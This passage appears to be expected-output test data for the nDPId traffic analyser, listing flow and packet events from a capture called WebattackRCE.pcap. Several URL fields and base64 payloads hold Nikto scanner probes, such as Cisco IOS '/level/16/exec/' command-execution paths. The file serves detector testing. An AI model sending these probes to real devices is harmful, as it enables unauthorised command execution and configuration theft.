{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}} 
+01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277565,"pkt":"AAAAAAAAAAAAAAAACABFAADKFqFAAEAGJYt\/AAABfwAAAcXuH5Ag7S5xgHE61oAYAED+vgAAAQEICp1m\/mWdZv5lR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9wd2QgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1MykNCg0K"} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}} 
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277566,"pkt":"AAAAAAAAAAAAAAAACABFAADZY3pAAEAG2KJ\/AAABfwAAAcXwH5Bf2FuYp3IH4oAYAED+zQAAAQEICp1m\/madZv5mR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}} 
+01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277567,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ybtAAEAGcn1\/AAABfwAAAcXyH5BbOPFKogxutoAYAED+sQAAAQEICp1m\/medZv5nR0VUIC9sZXZlbC8xNiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU1KQ0KDQo="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}} 
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277568,"pkt":"AAAAAAAAAAAAAAAACABFAADDBTJAAEAGNwF\/AAABfwAAAcX0H5Cobz3BWm\/3E4AYAED+twAAAQEICp1m\/midZv5oR0VUIC9sZXZlbC8xNi9leGVjLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277570,"pkt":"AAAAAAAAAAAAAAAACABFAADVrDFAAEAGj+9\/AAABfwAAAcX2H5DQ55TgYEZuMYAYAED+yQAAAQEICp1m\/mqdZv5qR0VUIC9sZXZlbC8xNi9leGVjLy9zaG93L2FjY2Vzcy1saXN0cyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}} 
+01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1576420277572,"pkt":"AAAAAAAAAAAAAAAACABFAADf3g5AAEAGXgh\/AAABfwAAAcX4H5Dm0Ob+nlg5uYAYAED+0wAAAQEICp1m\/mydZv5sR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1OCkNCg0K"} -01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}} 
+01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7580000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277574,"pkt":"AAAAAAAAAAAAAAAACABFAADcDd9AAEAGLjt\/AAABfwAAAcX6H5DZiDUt3Agrh4AYAED+0AAAAQEICp1m\/m6dZv5uR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}} 
+01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
